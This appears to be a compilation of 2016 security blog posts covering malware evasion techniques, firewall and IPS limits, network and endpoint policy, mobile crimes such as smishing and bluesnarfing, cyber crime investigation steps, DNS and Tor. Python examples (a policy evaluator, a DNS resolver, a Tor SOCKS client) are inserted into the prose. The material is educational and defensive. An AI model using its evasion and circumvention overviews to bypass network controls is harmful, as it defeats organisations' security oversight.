Proxies. Advanced malware and hackers use proxies to traverse traditional firewalls. TDL-4, the “indestructible botnet” (refer to Chapter 2) installs a proxy server on every host that it infects. This allows the bot to not only protect its own communications, but also to establish an anonymous network that anyone can use to hide his tracks while hacking or conducting other illegal activities.


 Anonymizers and circumventors. Tools such as UltraSurf, Tor, and Hamachi are purpose-built to avoid network security controls. Unlike most of the other technologies discussed in this section, circumventors have almost no legitimate use in an enterprise network. These applications are updated on a monthly (and even weekly) basis to avoid detection in a perpetual cat-and-mouse game with traditional security solutions.


Encoding and obfuscation. Malware almost always encodes its transmissions in unique ways. Encoding and obfuscation not only help the malware avoid detection signatures, but also hide its true goal. The technique can be as simple as converting strings to hexadecimal, or as sophisticated as a custom algorithm that transforms the data in detail.

Firewalls

Port-based firewalls are often used as a first line of defense, providing coarse filtering of traffic and segmenting the network into different password-protected zones. One drawback of port-based firewalls is that they use protocol and port to identify and control what gets in and out of the network. This port-centric design is ineffective when faced with malware and evasive applications that hop from port to port until they find an open connection to the network. Such firewalls themselves have little ability to identify and control malware. Solutions that have added anti-malware capabilities to port-based firewalls, either as a blade module or as a UTM (Unified Threat Management) platform, have typically suffered from poor accuracy and severe performance degradation.


 Intrusion prevention

IPSs are a step in the right direction, in that they look much deeper into the traffic than a firewall does. However, IPS solutions typically don’t run a complete set of IPS signatures against all traffic. Rather, the IPS attempts to apply the appropriate signatures to specific types of traffic, based on port. This limitation means that malware or exploits on unexpected or nonstandard ports are likely to be missed. Additionally, IPS solutions lack the depth of malware detection needed to protect networks: most IPS solutions look for only a few hundred types of common malware, well short of the tens of thousands that exist.


Proxy solutions

Proxy solutions are another means of network traffic control. But they too look at a limited set of applications or protocols and see only a partial set of the network traffic that needs to be monitored. By design, proxies must mimic the applications they are trying to control, so they struggle with updates to existing applications and with new applications. As a result, although proxies understand a few protocols in depth, they typically lack the breadth of protocol support needed to control the tunnels and protocols-within-protocols that hackers use to hide their true traffic. A final issue that plagues proxy solutions is throughput performance, caused by the way a proxy terminates an application session on the proxy and then forwards it on to its destination.

The challenge with all of these network controls is that they cannot accurately identify applications and malware; they look at only a portion of the traffic and suffer from performance issues. Security policies must be based on the identity of users and the applications in use, not just on IP addresses, ports, and protocols. Without knowing and controlling exactly who (users) and what (applications and content) have access to the network, enterprise networks may be compromised by applications and malware that easily bypass port-based network controls.


Network controls

Given that advanced threats most often use the network for infection and ongoing command and control, the network is an obvious and critical policy-enforcement point. With application-enablement policies in place, IT can shift its attention to inspecting the content of allowed traffic. This inspection often includes looking at traffic for known malware, command-and-control patterns, exploits, dangerous URLs, and dangerous or risky file types.

When possible, policies that focus on the content of traffic should be coordinated as part of a single unified policy, where the rules (and the results of those rules) can all be seen in context. If content policies are spread across multiple solutions, modules, or monitors, piecing together a coordinated logical enforcement policy becomes increasingly difficult for IT security staff, and understanding whether those policies are working once implemented will likewise be difficult. The goal should be to create written policies that express their intent the way someone might describe it orally. For example, “only allow designated employees to use SharePoint, inspect all SharePoint traffic for exploits and malware, disallow the transfer of file types X, Y, and Z, and look for the word confidential in traffic going to untrusted zones.”

Another key component of network policies is the absolute need to retain visibility into the traffic content. SSL is increasingly used to secure traffic destined for the Internet. Although this may provide privacy for that particular session, if IT lacks the ability to look inside the SSL tunnel, SSL also provides an opaque tunnel through which malware can be introduced into the network environment. IT must balance the need to look within SSL against both the privacy requirements of end-users and the overall performance requirements of the network. For this reason, it is important to establish SSL decryption policies that can be enforced selectively by application and URL category. For example, social media traffic could be decrypted and inspected for malware, while traffic to financial or healthcare sites is left encrypted.
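As an added example (not code from the original page), the evaluator below writes the spoken-style SharePoint policy and the selective SSL decryption policy from the paragraphs above as one ordered rule set, so every verdict records which rule fired, whether the session was decrypted, and which inspections could actually run; it also makes visible that a session left encrypted by policy receives no content inspection. The group name, URL categories, the concrete file types standing in for X, Y and Z, and all sessions are assumptions.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Assumed URL-category decryption policy: decrypt social media, leave financial
# and healthcare sessions encrypted; categories not listed are decrypted.
DECRYPT_BY_CATEGORY = {"social-media": True, "financial": False, "healthcare": False}


@dataclass
class Session:
    user: str
    groups: List[str]
    app: str
    url_category: str
    dest_zone: str
    tls: bool
    file_type: Optional[str] = None
    text: str = ""            # payload text, visible only if cleartext or decrypted


@dataclass
class Rule:
    name: str
    action: str                                   # "allow" or "deny"
    app: Optional[str] = None                     # None matches any application
    groups: Optional[List[str]] = None            # None matches any user
    inspections: List[str] = field(default_factory=list)
    blocked_file_types: List[str] = field(default_factory=list)
    dlp_words: List[str] = field(default_factory=list)
    dlp_zones: List[str] = field(default_factory=list)


# The page's spoken-style SharePoint policy as ordered rules; the group name and
# the file types standing in for X, Y, Z (exe, scr, bat) are assumptions.
RULES = [
    Rule("sharepoint-designated", "allow", app="sharepoint",
         groups=["sharepoint-users"], inspections=["exploits", "malware"],
         blocked_file_types=["exe", "scr", "bat"],
         dlp_words=["confidential"], dlp_zones=["untrusted"]),
    Rule("sharepoint-everyone-else", "deny", app="sharepoint"),
    Rule("general-web", "allow", inspections=["malware", "urls"]),
]


def matches(rule: Rule, s: Session) -> bool:
    if rule.app is not None and rule.app != s.app:
        return False
    return rule.groups is None or bool(set(rule.groups) & set(s.groups))


def evaluate(s: Session) -> Dict[str, object]:
    """First matching rule decides; the verdict keeps rule, decryption decision
    and inspections together so the outcome can be read in context."""
    for rule in RULES:
        if not matches(rule, s):
            continue
        verdict: Dict[str, object] = {"rule": rule.name, "action": rule.action,
                                      "decrypt": False, "inspections": []}
        if rule.action == "deny":
            return verdict
        decrypt = s.tls and DECRYPT_BY_CATEGORY.get(s.url_category, True)
        verdict["decrypt"] = decrypt
        if s.tls and not decrypt:
            verdict["inspections"] = ["none: opaque TLS tunnel"]   # privacy trade-off
            return verdict
        verdict["inspections"] = list(rule.inspections)
        if s.file_type in rule.blocked_file_types:
            verdict.update(action="deny", reason=f"file type {s.file_type} blocked")
        elif s.dest_zone in rule.dlp_zones and any(
                w in s.text.lower() for w in rule.dlp_words):
            verdict.update(action="deny", reason="sensitive word to untrusted zone")
        return verdict
    return {"rule": None, "action": "deny", "decrypt": False, "inspections": []}
```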


Endpoint controls

The end-user’s machine is the most common target for advanced malware and is a critical point for policy enforcement. Endpoint policies must incorporate ways of ensuring that antivirus and the various host-based security solutions are properly installed and up to date. Although targeted attacks are becoming more common, the majority of threats today continue to be known threats with known signatures. Gartner, Inc. predicts that known threats will comprise 95 percent of all threats through 2015. As such, these endpoint solutions must be kept up to date and must be audited regularly.

Similarly, you need a method for validating that host operating systems are patched and up to date. Many malware infections begin with a remote exploit that targets a known vulnerability in the operating system or an application, so keeping these components up to date is a critical aspect of reducing the attack surface of the enterprise.

As with employee policies, desktop controls are a key piece of the safe enablement of applications in the enterprise. Desktop controls present IT departments with significant challenges. Careful consideration should be given to the granularity of the desktop controls and their impact on employee productivity. The drastic step of desktop lockdown, to keep users from installing their own applications, is easier said than done and, if used alone, will be ineffective. Here’s why:

✓ Remotely connected laptops, Internet downloads, USB drives, and e-mail are all means of installing applications that may or may not be allowed on the network.

✓ Completely removing administrative rights is difficult to implement and, in some cases, severely limits end-user capabilities to an unacceptable level.

✓ USB drives are now capable of running applications, so a Web 2.0 application, for example, can be accessed after network admission is granted.

Desktop controls can complement documented employee policies as a means to safely enable Web 2.0 applications.


Author : cialfor

Updated : 9/26/2016

Reference :

  1. wikipedia
  2. image credit to google
  3. introduction to cyber security –  Data64

Why is mobile a tool of crime ?

The creativity and innovation of the great master Sir Martin Cooper have drastically changed the current generation of the world’s most interactive beings. Mobile phones in today’s world have completely replaced the personal computer or laptop and have been made smart so that people can do things faster and smarter. Mobile phones have changed the history of the technological world by bringing together a combination of techniques to fulfill the basic necessities of today’s generation.

The mobile phone has become a key component in the life of the common man. From 16 to 60 and beyond, with no age limit, the present generation has carved an everlasting path in the skilled growth of the mobile industry, creating a boom in the electronics sector. The usage of mobile devices paved the way for the successful growth of the electronics industry.


Ever since the mobile phone carved its booming path into the common man’s life, it has been easy for cyber criminals to use the mobile as a medium or tool of attack. While the growth of technology had a good impact on the life of the common man, the same technological growth was used to tamper with it.

Types of mobile phone related crimes


Vishing :

Vishing is the act of using the telephone in an attempt to scam the user into surrendering private information that will be used for identity theft. The scammer usually pretends to be a legitimate business, and fools the victim into thinking he or she will profit.


  • Purpose :
    • To extract sensitive information from the victim, by means of social engineering.
    • Cheating by personation.
    • Identity theft

Smishing :

Smishing is a security attack in which the user is tricked into downloading a Trojan horse, virus or other malware onto his cellular phone or other mobile device. Smishing is short for “SMS phishing.”
Just like phishing, smishing uses cell phone text messages to lure consumers in. Often the text will contain a URL or a phone number. The phone number often leads to an automated voice response system. And again, just like phishing, the smishing message usually asks for your immediate attention.
In many cases, the smishing message will come from a “5000” number instead of displaying an actual phone number. This usually indicates that the SMS message was sent to the cell phone via email, and not from another cell phone.


  • Purpose :
    • To steal sensitive data from the victim’s mobile by using malware.
    • Act of Social Engineering.
    • To track the victim’s device by sending a malware to the device

Lottery Scams :

A lottery scam is a type of advance-fee fraud which begins with an unexpected email notification, phone call, or mailing (sometimes including a large check) explaining that “You have won!” a large sum of money in a lottery.


  • Purpose :
    • To make the victim believe that he has won a lottery and extract sensitive information from him.

The Blue Bugging :


This attack involves the virtual takeover of the victim’s phone through a backdoor mechanism. A backdoor is generally put in place by a developer for troubleshooting a problem, but the same mechanism is used by attackers to gain access to the victim’s device by bypassing its security controls.

Blue Jacking :


It is a milder version of bluebugging: it involves sending anonymous, unwanted messages to other users with Bluetooth-enabled mobile phones. A bluejacker uses a feature originally intended for exchanging contact details or electronic business cards. The attacker adds a new entry in the address book, types in a message, and sends it via Bluetooth.

Blue Snarfing :


Bluesnarfing is the theft of data from a Bluetooth phone. The attacker, just by running the right software on their laptop, can discover a nearby phone, connect to it without confirmation and download confidential data. Even turning off Bluetooth discoverability does not make a potential victim safe, since a device in hidden state may still be Bluesnarfed by guessing the device’s MAC address through a brute-force attack.

Reference : www.google.com

Author : cialfor

Updated : 9/26/2016


Cyber crime investigation is the collection, analysis and investigation of digital evidence and cyber trails. These digital evidence and cyber trails may be found in computer hard disks, cell phones, CDs, DVDs, pen drives, computer networks, the Internet etc.

 


 

Digital evidence and cyber trails can be hidden in pictures (steganography), encrypted files, password-protected files, deleted files, formatted hard disks, deleted emails, chat transcripts etc.

 

Digital evidence and cyber trails can relate to online banking fraud, online share trading fraud, source code theft, credit card fraud, tax evasion, virus attacks, cyber sabotage, phishing attacks, email hijacking, denial of service, hacking, divorce cases, murder cases, organized crime, terrorist operations, defamation, pornography, extortion, smuggling etc.

 


 

 

The following are the steps to be taken and points to be borne in mind by the investigating officer.


Let us take the example of the suspect computer or computer systems present in an organization.

 

  1. The officer should have some members of a police team with him. They will assist him in maintaining order while the investigation is being carried out.
  2. The team of experts should be prepared (with the required tools) for conducting any kind of examination on the suspected systems.
  3. On reaching the scene of investigation, the police officers should seal the entrances and exits to the place.
  4. They should ask the employees of the organization to move away from their machines. If possible, the employees should be made to gather in a room where no machines are present.
  5. The employees should be retained till their statements (if required) have been taken.
  6. The fingerprint experts should gather any fingerprints available from the machines which are to be investigated. This may, at times, assist in revealing the person(s) who have used a computer. The results of the fingerprinting exercise can then be compared with the access control policy of the organization to verify whether any unauthorized access has taken place.
  7. The computer experts should locate all the important servers and also understand the layout of the network. They should also make a chart of the network. At times, this assists in understanding the path for the flow of information.
  8. There should be regular and meticulous documentation of every step being taken. This will prove invaluable while proving the authenticity and accuracy of the investigation in a court of law.

Reference : www.google.com

Author : cialfor

Updated : 9/26/2016

Domain Name System

DNS is a distributed database that contains mappings of DNS domain names to data. It is also a protocol for Transmission Control Protocol/Internet Protocol (TCP/IP) networks, defined by the Requests for Comments (RFCs) that pertain to DNS. DNS associates various information with the domain names assigned to each of the participating entities. DNS not only translates names; it also remembers a domain name and the IP address correlated with it once they are new to that server. The Internet maintains two principal namespaces: the domain name hierarchy and the Internet Protocol address spaces.

Domain Name Space

A domain namespace is a name service provided by the Internet for Transmission Control Protocol/Internet Protocol. DNS is broken up into domains, a logical organization of computers that exist in a larger network. The domain name space is organized as a tree starting from the root. Each branch is a domain; each sub-branch is a subdomain.

 


 

DNS Caching

Even communication between user and host takes up to a few hundred milliseconds to send and receive any message or query, and sometimes a server responds very slowly because of heavy traffic. The easy way to speed up this process is to cache the information locally, eliminating the need for repetitive queries to the remote DNS server. This is done by consulting a local database on your computer rather than the remote DNS server. The PostCast server, for example, contacts the remote DNS server once and then caches (memorizes) the addresses returned from the query. The next time a request comes in for the same domain name, it instantly returns the answer without having to contact your ISP’s DNS server for the translation.

 

[Figure: domain name caching]

DNS Resolver

The client side of the DNS is called a DNS resolver. A resolver is responsible for initiating and sequencing the queries that ultimately lead to a full resolution of the resource sought. An individual DNS query may be non-recursive, recursive or iterative, or a combination of these. With the non-recursive query method, a DNS resolver client queries a DNS server that either provides a record for a domain for which it is itself authoritative, or provides a partial result without querying other servers. In the case of a caching DNS resolver, the non-recursive query of its local DNS cache delivers a result and reduces the load on upstream DNS servers by caching DNS records for a period of time after an initial response from the upstream servers. With the recursive query approach, a DNS resolver client queries a single DNS server, which may then query other DNS servers (as a client itself) as needed. With the iterative query procedure, a DNS resolver client queries a chain of one or more DNS servers. Each server refers the client to the next server in the chain, until the current server can fully resolve the request.


 

Reverse Lookup

A reverse lookup is a query of the DNS for domain names when the IP address is known. Multiple domain names may be associated with an IP address. The DNS stores IP addresses in the form of domain names as specially formatted names in pointer (PTR) records within the infrastructure top-level domain ARPA.
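The caching, iterative-resolution and reverse-lookup sections above fit together in one small model. As an added example (not code from the original page), the resolver below walks a referral chain from a root stand-in to an authoritative stand-in, caches positive answers for their TTL so a repeat query touches no server, and builds the PTR owner name a reverse lookup asks for under the ARPA infrastructure domain (in-addr.arpa for IPv4, ip6.arpa for IPv6). The in-memory zone data, names, addresses and TTLs are constructed, and the real RIR delegation level under in-addr.arpa is flattened away.

```python
import ipaddress
import time
from typing import Dict, List, Optional, Tuple

# Constructed stand-ins for real servers: each maps an owner name to one
# record (type, data, ttl); an NS record is a referral to another stand-in.
# Real in-addr.arpa is delegated via the RIRs; that level is flattened here.
SERVERS: Dict[str, Dict[str, Tuple[str, str, int]]] = {
    "root": {"com.": ("NS", "tld-com", 172800),
             "arpa.": ("NS", "tld-arpa", 172800)},
    "tld-com": {"example.com.": ("NS", "auth", 86400)},
    "tld-arpa": {"2.0.192.in-addr.arpa.": ("NS", "auth", 86400)},
    "auth": {"www.example.com.": ("A", "192.0.2.10", 300),
             "10.2.0.192.in-addr.arpa.": ("PTR", "www.example.com.", 300)},
}


def query_server(server: str, qname: str, qtype: str) -> Tuple:
    """One query to one stand-in: ('answer', data, ttl), ('referral', next)
    or ('nxdomain',). A referral names the closest zone this server delegates."""
    records = SERVERS[server]
    rr = records.get(qname)
    if rr and rr[0] == qtype:
        return ("answer", rr[1], rr[2])
    labels = qname.split(".")
    for i in range(1, len(labels)):            # walk up: example.com., com., ...
        rr = records.get(".".join(labels[i:]))
        if rr and rr[0] == "NS":
            return ("referral", rr[1])
    return ("nxdomain",)


class CachingResolver:
    """Iterative resolver with a positive cache keyed by (name, type)."""

    def __init__(self) -> None:
        self.cache: Dict[Tuple[str, str], Tuple[str, float]] = {}

    def resolve(self, qname: str, qtype: str = "A",
                now: Optional[float] = None) -> Tuple[Optional[str], List[str]]:
        """Return (data, servers_queried); a fresh cache entry queries no server."""
        now = time.time() if now is None else now
        hit = self.cache.get((qname, qtype))
        if hit and hit[1] > now:
            return hit[0], []
        trace: List[str] = []
        server = "root"
        for _ in range(8):                      # bound the referral chain
            trace.append(server)
            result = query_server(server, qname, qtype)
            if result[0] == "answer":
                self.cache[(qname, qtype)] = (result[1], now + result[2])
                return result[1], trace
            if result[0] != "referral":
                break
            server = result[1]
        return None, trace


def reverse_name(ip: str) -> str:
    """PTR owner name: reversed octets under in-addr.arpa for IPv4, reversed
    hex nibbles under ip6.arpa for IPv6."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 4:
        return ".".join(reversed(str(addr).split("."))) + ".in-addr.arpa."
    return ".".join(reversed(addr.exploded.replace(":", ""))) + ".ip6.arpa."
```

Resolving the same name twice within 300 seconds returns an empty trace the second time; after the TTL expires the resolver walks the chain again.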

Author : cialfor

Updated : 9/26/2016


TOR

Tor is an anonymizer operated by a group of volunteers that allows people to improve their privacy and security on the Internet. Tor uses a series of virtual tunnels rather than making a direct connection, allowing both organizations and individuals to share information over public networks without compromising their privacy. It also gives users access to blocked destinations or content. The name Tor is an acronym derived from the original software project name, “The Onion Router”.

History

The onion router was developed in the mid-1990s by United States Naval Research Laboratory employees, mathematician Paul Syverson and computer scientists Michael G. Reed and David Goldschlag, to protect U.S. intelligence communications. In December 2006, Dingledine, Mathewson and five others founded The Tor Project, a Massachusetts-based 501(c)(3) research-education nonprofit organization responsible for maintaining Tor. The EFF acted as The Tor Project’s fiscal sponsor in its early years, and early financial supporters of The Tor Project included the U.S. International Broadcasting Bureau, Internews, Human Rights Watch, the University of Cambridge, Google, and Netherlands-based Stichting NLnet.

How does Tor work?

The Tor software protects users by bouncing their communications around a distributed network of relays run by volunteers all around the world. It prevents somebody watching a user’s Internet connection from learning what sites the user visits, it prevents the sites the user visits from learning the user’s physical location, and it also gives the user access to sites which are blocked.


Originating traffic

A Tor user’s SOCKS-aware applications can be configured to direct their network traffic through a Tor instance’s SOCKS interface. Tor periodically creates virtual circuits through the Tor network through which it can multiplex and onion-route that traffic to its destination. Once inside a Tor network, the traffic is sent from router to router along the circuit, ultimately reaching an exit node at which point the clear text packet is available and is forwarded on to its original destination. Viewed from the destination, the traffic appears to originate at the Tor exit node.


Features of Tor Browser

  • Cross-platform availability: the application is available for Linux, Windows and Mac.
  • Complex data encryption before it is sent over the Internet.
  • Automatic data decryption at the client side.
  • It is a combination of the Firefox browser and the Tor Project.
  • Provides anonymity to servers and websites.
  • Makes it possible to visit blocked websites.
  • Performs tasks without revealing the IP of the source.
  • Capable of routing data to/from hidden services and applications behind firewalls.
  • Portable: runs a pre-configured web browser directly from a USB storage device, with no need to install it locally.
  • Available for the x86 and x86_64 architectures.
  • Easy to set up FTP with Tor by configuring a “socks4a” proxy on “localhost” port “9050”.
  • Tor is capable of handling thousands of relays and millions of users.
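The “Originating traffic” section above and the “socks4a proxy on localhost port 9050” item in this list describe the same handshake: a SOCKS-aware application hands its connection request to Tor’s local SOCKS interface. As an added example (not code from the original page or from the Tor Project), the functions below build and parse that exchange; the SOCKS4a form carries the destination hostname so Tor resolves it inside the circuit, whereas the plain SOCKS4 form would need a local DNS lookup that reveals the destination before Tor is involved. The REPLY_CODES table follows the SOCKS4 status byte values, and connect_via_tor needs a running Tor, so it is not exercised offline; the sample address is constructed.

```python
import socket
import struct
from typing import Tuple

TOR_SOCKS = ("localhost", 9050)      # Tor's SOCKS listener, as given on the page

# SOCKS4 reply status byte (CD field) meanings
REPLY_CODES = {0x5A: "request granted", 0x5B: "request rejected or failed",
               0x5C: "identd not reachable", 0x5D: "identd user mismatch"}


def socks4_connect_request(ip: str, port: int, userid: str = "") -> bytes:
    """Plain SOCKS4 CONNECT: VN=4, CD=1, port, IPv4 address, userid, NUL.
    The client had to resolve the name itself, so the lookup leaks locally."""
    return (struct.pack(">BBH", 4, 1, port) + socket.inet_aton(ip)
            + userid.encode("ascii") + b"\x00")


def socks4a_connect_request(host: str, port: int, userid: str = "") -> bytes:
    """SOCKS4a CONNECT: the address field is 0.0.0.x (x != 0) and the hostname
    follows the userid, so the proxy (Tor) performs the resolution."""
    return (struct.pack(">BBH", 4, 1, port) + bytes([0, 0, 0, 1])
            + userid.encode("ascii") + b"\x00" + host.encode("idna") + b"\x00")


def is_socks4a(request: bytes) -> bool:
    """True when a CONNECT request defers name resolution to the proxy."""
    return (len(request) > 8 and request[:2] == b"\x04\x01"
            and request[4:7] == b"\x00\x00\x00" and request[7] != 0)


def parse_socks4_reply(reply: bytes) -> Tuple[bool, str]:
    """First 8 reply bytes: VN=0, CD=status, then port and address."""
    if len(reply) < 8 or reply[0] != 0:
        raise ValueError("malformed SOCKS4 reply")
    code = reply[1]
    return code == 0x5A, REPLY_CODES.get(code, f"unknown status {code:#04x}")


def connect_via_tor(host: str, port: int, proxy=TOR_SOCKS,
                    timeout: float = 10.0) -> socket.socket:
    """Open a TCP stream to host:port through a locally running Tor."""
    sock = socket.create_connection(proxy, timeout=timeout)
    try:
        sock.sendall(socks4a_connect_request(host, port))
        granted, why = parse_socks4_reply(sock.recv(8))
        if not granted:
            raise ConnectionError(f"Tor refused CONNECT: {why}")
    except Exception:
        sock.close()
        raise
    return sock
```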

 

Some instructions for using Tor successfully

  • Use the Tor Browser. Tor does not protect all of your Internet traffic when you run it; it protects only those applications that are properly configured to send their Internet traffic through Tor. The Tor Browser is configured to protect your privacy and anonymity on the web as long as you are browsing with it.
  • Don’t torrent over Tor. Torrent file-sharing applications ignore proxy settings and make direct connections even when they are told to use Tor. Even if your torrent application connects only through Tor, you will often send out your real IP address in the tracker GET request, because that is how torrents work.
  • Don’t enable or install browser plugins; they can harm your anonymity. The Tor Browser blocks browser plugins such as Flash, RealPlayer, QuickTime and others, because they can be manipulated into revealing your IP address. Similarly, installing additional add-ons or plugins into the Tor Browser is not recommended, as these may bypass Tor or otherwise harm your anonymity and privacy.

Author : cialfor

Updated : 9/26/2016

Reference

www.en.wikipedia.org

www.tecmint.com

www.torproject.org

Image credit to 

www.google.com